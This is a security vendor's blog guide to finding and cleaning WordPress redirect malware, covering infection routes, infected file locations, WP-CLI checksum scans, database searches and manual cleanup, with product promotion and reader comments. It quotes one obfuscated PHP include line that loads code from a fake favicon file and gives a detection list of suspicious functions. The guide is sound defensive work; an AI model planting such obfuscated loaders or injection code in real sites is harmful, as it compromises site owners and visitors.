911 Hack Removal

Fixing WordPress Redirect Hack – WordPress Site Redirecting to Another Site

Updated on: June 8, 2020

Fixing WordPress Redirect Hack – WordPress Site Redirecting to Another Site

Is your WordPress website redirecting users to unknown malicious sites? If yes, then your website might be hacked. The famous WordPress redirect hack is one of the most exploited WP hacks by the hackers. There’s a reason behind this being exploited so much, more on it below.

Variations and Symptoms of the WordPress Redirect Hack

‘WordPress hacked redirect’ to questionable domains isn’t a new hack. Over the years hackers have evolved this virus to make it more subtle and difficult for you to detect. Here are some of the variations of the WordPress redirection hack:

Hack TypesSymtoms
Classic Redirection HackThe hacked redirect has been around since the longest time. Every time someone visits your website, they're redirected to questionable links like pharma sites, adult websites etc.
Redirection via Search ResultsWhen website is opened by entering the URL in the browser, it opens fine. But when opened by searching on Google, it redirects to malicious websites.
Device Specific WordPress RedirectionThe website only redirects when opened from mobile device or only redirects when opened from desktop depending on what type of malware is present.
Push Notifications HackWe've seen this one since last few months where hackers also show browser push notifications to your visitors. Usually these push notifications point to porn websites.
Geography Specific RedirectionIn some cases, some visitors of yours might see a redirection and some might not. This could be because hackers program the malware to work only for certain geographies. Where exactly the malware redirects also can be tailored geography-wise by hackers.

Symptoms of the WordPress Hacked Redirect:

A few examples of the pages where redirection malware redirects to.

  1. The obvious redirection to malicious websites

  2. Google search results for your website being full of spam

  3. Un-identified push notifications on your website

  4. Malicious javascript code in the index.php file

  5. Un-identified code within .htaccess

  6. Un-identified files on the server with gibberish names

WordPress Spam Redirect: How was your WordPress website infected?

Truth be told, there can be a dozen or more methods using which hackers can perform this hack. Some of them are listed below:

Recent Redirect Hack – WordPress site redirecting to digestcolect [.] com

By exploiting plugin vulnerabilities (XSS)

Vulnerabilities such as Stored Cross-site Scripting (XSS) in WordPress plugins make it possible for hackers to add malicious JavaScript code to your website. When hackers get to know that a plugin is vulnerable to XSS, they find all the sites that are using that plugin and try to hack it. Plugins such as WordPress Live Chat Support and Elementor Pro were a target of such redirection hacks.

By inserting codes in .htaccess or wp-config.php files

When scanning a site for malware, more often than not the .htaccess and wp-config.php files get ignored by free security plugins. For WordPress sites redirecting to Pharma websites, we’ve seen that bad code is added to the .htaccess files disguised as any normal code. The hackers place the code in such way that you cannot even find this code hidden in the file unless you scroll a lot to the right. This makes it more difficult to identify and remove such redirection hacks. Apart from these two files, you should also check all the WordPress core files such as functions.php, header.php, footer.php, wp-load.php, wp-settings.php etc.

When scanning of our customer’s website for malware, we found the following code hidden in the .htaccess file. It redirects website visitors too spammy & dangerous pharma websites.

Malicious codes in .htaccess - WordPress Hacked Redirect
Malicious code in .htaccess

By inserting JavaScript in the site header

Some plugins & themes allow you to add code in the <head> or just before </body>tag. This can be useful to add JS code for Google Analytics, Facebook, Google Search console etc. We’ve seen such features being abused by hackers for WordPress site redirection.

In an attempt to make it difficult to search for, the malicious website URL is often converted from a string format to its respective character codes. The converted code looks something like this:

JavaScript in WordPress
An example of malicious JavaScript in WordPress

By adding themselves as ghost admins to wp-admin

Due to privilege escalation vulnerabilities in plugins, it is sometimes possible for hackers to create ghost or fake admin users to your site. Once the hack becomes an administrator, they get full access to your website and add backdoors and redirection code on your site.

Where is the WordPress Redirect Infection?

Core WordPress & Theme files

Attackers can infect the website by injecting code in any of the core files on WordPress. Check these files for malicious codes:

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess
  • Theme files (wp-content/themes/{themeName}/)
    1. footer.php
    2. header.php
    3. functions.php

All JavaScript files

Some variants of the redirection malware infect ALL the JavaScript(.js) files on the websites. This includes the JS files in the wp-include, plugin, theme folders etc. The same obfuscated code is usually added at the top of each JS files.

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security Suite before it’s too late.

WordPress Database

The wp_posts and wp_options tables are the most targeted tables in a WordPress site. Spam site links & JS code is often found in each of your articles or pages.

Fake favicon.ico files

Some malware creates rogue favicon.ico or random .ico files on your server which contain malicious PHP code inside them. This malicious PHP code is known to perform dangerous actions on the websites such as URL injection, creation of administrator accounts, installing spyware/trojans, creating phishing pages etc.

It pollutes your server with spam files. These files contain malicious code within them instead of the genuine icon image code. Some of the code used to load such files can be seen below:

@include "\x2f/sg\x62/fa\x76ico\x6e_54\x656ed\x2eico";

WordPress Redirect Hack – Scanning  WordPress For Redirection Malware:

To get started with the malware scanning process, you’ll first have to identify the type of redirection hack that your site is facing. Once you’ve done that from referring to the steps given above, we’ll have to find to actually find the malicious code and removing it from your site.

You can either opt for an automated malware scanning solution, or proceed with a manual aapproach. Here are some steps you can take to remove the redirection hack:

1. Use a WordPress Malware Scanner

For not-so-technical WordPress users, a malware removal solution such as Astra would be the fastest & easiest way to find, remove and fix the WordPress redirection issue without breaking your site.

If you want to manually scan your site and find a solution based on the type of redirection hack you are facing, follow each of the steps given ahead.

2. Check with online security scan tools

As a preliminary check, you can scan your site using tools such as Astra’s free Security Scanner and Google Safe Browsing. If your site has links to any blacklisted urls, you will be alerted by these tools. You’ll also get a short list (not exhaustive) of some the malicious code snippets found in your site. For a detailed scan you would either have to scan all website files manually, or get a malware scan done.

3. Verify WordPress Core File Integrity

To see if any malicious code has been injected into the core WordPress files, you can run a run a file integrity check using WP-CLI. To run such checks, follow these steps:

  1. Login to your server via SSH
  2. Install WP-CLI
  3. Change directory to the location where you have WordPress installed
    cd /var/www/html/
  4. Check your current WordPress with the following command
    wp core version
  5. Now run the the we’ll run the command to get a list of files who’s checksum doesn’t match with the original WordPress release
    wp core verify-checksums
  6. Look at the output from the above command. Some warnings are okay. However, if core files do not match checksums you may need to replace your core files, or restore a backup.

To see the difference between the Original CMS file and the actual file visually, you can run a core file integrity scan with Astra.

File difference checker - Astra Security
File difference checking in Astra

4. Remove hidden backdoors & redirection code

Hackers usually leave a way to get back into your site. Backdoors are usually there in files which are named just like legitimate files.

You can manually search your websites files for common malicious PHP functions such as eval, base64_decode, gzinflate, preg_replace, str_rot13, eval etc. Note that these functions are also used by WordPress plugins for legitimate reasons, so make sure you take a backup or get help such that you do not accidentally break the site.

5. See if any new admin users were added

Login to your WordPress admin area, and check if any ghost/unknown administrator users have been added. Hackers routinely add themselves as an admin so that they retain access to your site and re-infect it even after you remove the redirection hack.

If you find any such users, quickly delete the accounts and change passwords for all other Admin accounts.

While you’re at it, also make sure (depending on your website’s requirement) that the Membership option called “Anyone can register” is disabled and the option “New User Default Role” is set to Subscriber.

6. Scan Plugins & Theme files

Check for fake & vulnerable plugins

Click on ‘Plugins’ in the left panel to see all the plugins that are installed on your site. If you see any unknown plugins, delete them.

For plugins that have updated available, check on the WordPress plugin changelog if any recent security issues have been found. Also, scan the plugin files for backdoors and redirection code as mentioned in step #4 above.

wordpress hacked redirect malware code
Sample of the malicious code injected in the header.php file

Use online tools (For e.g. diff checker) to compare your plugin files with the original ones. You can do this by downloading the same plugins from the WordPress plugin repository and them matching your installed plugins against these.

However, this also has a set of limitations. Since you would be using multiple plugins, it is not always possible to compare each and every file. Also, if the the redirection hack is because of a zero day, then chances are that an update for the plugin is not available.

7. Search database for malicious links

You can manually search your WordPress database for common malicious PHP functions like we did to find backdoors. Login to a database management tool such as phpMyAdmin or Adminer. Select the database used by your site and search for terms such as as <script>, eval, base64_decode, gzinflate, preg_replace, str_replace, etc.

Be really careful before you make any changes, as even a tiny change such as a space has the potential to break the site from loading or function properly.

WordPress Hacked Redirect: How to clean your website?

Now that you’ve scanned your site and have identified the malicious code, we need to remove it.

  1. Start by taking a backup of your website files & database (even though they might be infected).
  2. Login to your server so that you can view & quarantine the malicious files. You can use the File Manager provided within cPanel, or traditional methods such as (s)FTP or SSH.
  3. Now edit the files which were flagged in the previous steps. Identify the malware bits in the file and remove the code. If the whole file is malicious, you can delete the whole file.
  4. If you have found multiple files with the same bit of malicious code, you can use the find & sed Linux commands via SSH. Please be very careful while using these are the changes cannot be reversed.

    Example:
    find /path/to/your/folder -name “.js” -exec sed -i “s//ReplaceWithMalwareCode*//n&/g” ‘{}’ ;
  5. Once all the files & database has been cleaned, don’t forget to purge the website cache
  6. Verify that your site is no longer redirecting by visiting your website in Private Browsing/Incognito mode.

Need someone to do all this for you?

If you prefer that your website is fixed quickly by professionals, we can help! With Astra’s award winning security suite & malware cleanup solution, your website will be thoroughly scanned & fixed from not just the WordPress redirection hack but also from backdoors, viruses, trojans etc. Once the hack is removed, your site would be protected with our firewall to prevent re-infection 💪

30,000 websites get hacked every single day. Are you next?

Secure your website from malware & hackers using Astra Security Suite before it’s too late.

Since redirection malware is so prevalent , we’ve made a detailed step-by-step video on fixing redirection hacks. Though hackers always keep on updating their methods to avoid coming on the radar of security companies, thee underlying principle is the same.

Also, check our detailed guide How to Fix Unwanted Pop-Ups in your WordPress Website

WordPress Malicious Redirects: Conclusion

Hackers are always evolving their methods, exploiting vulnerabilities not known to the world and combining various exploits to create a hack. While removing the hack is one part, ensuring one never gets hacked requires something more permanent – like Astra’s Security suite 🙂

Don’t take our words for it. See it for yourself!

Peek inside Astra

Was this post helpful?

Tags: , , , , ,

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France).At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cybersecurity community and shared his knowledge at various forums & invited talks.
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

14 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Alex Morco
Alex Morco
1 year ago

Nowadays, after some viruses, hacking of websites are now easier and many hackers always try to hack websites even Gov websites. We should always scan our websites from malware and keep them secure, I like your guide about helping people to recover their hacked WordPress blog, Also, they have mentioned about scanning and keeping it safe.

Naman Rastogi
Admin
7 months ago
Reply to  Alex Morco

Thank you so much. You can follow our detailed hack removal guide too https://www.getastra.com/blog/911/wordpress-site-hacked-malware-backdoor/

trackback

[…] not taken – a hacker may be able to launch Pharma attacks, Phishing pages, Japanese SEO spam, Redirection Malware etc. through WordPress Admin panel […]

trackback

[…] Pages on your website are being redirected to shady websites […]

trackback

[…] footer.php is an important file that can be targeted by the attackers. It is often used for malware redirects and displaying spam content  as was the case of Default7.com Redirect Malware. In many cases, […]

trackback

[…] Related Article : WordPress Redirect Hack […]

rana
1 year ago

Thanks for the clear explanation, I am using a custom theme and now I can understand that the issue seems to be with the theme. Thanks. Please let me know any recommendation of a trusted tutorial to clean a WordPress theme! It will be really helpful and I will be grateful to you.

trackback
1 year ago

[…] can be an indication or a symptom of a much bigger problem in your website. Probably a hack that redirects to several spammy pages. It could also happen that your website is being used as a host for these attacks and hence the […]

Tuan Arnao
Tuan Arnao
1 year ago

Comprehensive detailed writeup. I was able to resolve my issue. Thanks 🙂

Naman Rastogi
Admin
7 months ago
Reply to  Tuan Arnao

Thank you so much 🙂

Naman Rastogi
Admin
7 months ago
Reply to  Tuan Arnao

Thanks 🙂

Naman Rastogi
Admin
10 months ago

Hi Rana,

Thanks for your kind words. You can refer to these two blog post for malware removal

https://www.getastra.com/blog/911/wordpress-site-hacked-malware-backdoor/
https://www.getastra.com/blog/911/wordpress-backdoor-how-to-find-and-fix-wordpress-backdoor-hack/

Once the malware is removed, please follow our security guide
https://www.getastra.com/blog/cms/wordpress-security/wordpress-security-guide/

Let me know if you have any questions.

Roger Car
Roger Car
7 months ago

Delightful information, i was transferring from weebly to WordPress so this is what I needed!
Roger

Naman Rastogi
Admin
7 months ago
Reply to  Roger Car

Thanks, Roger

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany